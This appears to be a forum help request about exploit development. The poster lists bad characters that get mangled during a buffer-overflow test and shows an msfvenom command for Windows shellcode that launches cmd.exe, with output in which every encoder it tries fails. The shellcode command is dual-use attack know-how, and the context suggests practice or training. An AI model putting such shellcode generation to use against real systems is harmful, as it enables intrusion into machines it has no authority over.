I am facing a problem finding bad characters because the hex codes are being replaced with \x3F and some other codes.
Here I have all the 256 hex chars from \x01 to \xFF, and as you can see, many of the hex chars are being replaced with \x3F and other chars, and hence I am not able to figure out the bad chars.
I tried to figure out the bad chars and the chars which are being replaced, which are:
\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe
Then I used msfvenom to generate the shellcode, but I am getting the result below.
$msfvenom -a x86 --platform windows -p windows/exec cmd=cmd.exe -b '\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe' -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=84, char=0x0d)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive failed with Encoding failed due to a bad character (index=15, char=0x85)
Attempting to encode payload with 1 iterations of x86/xor_dynamic
Error: Bad character found in stub for the Dynamic key XOR Encoder encoder.
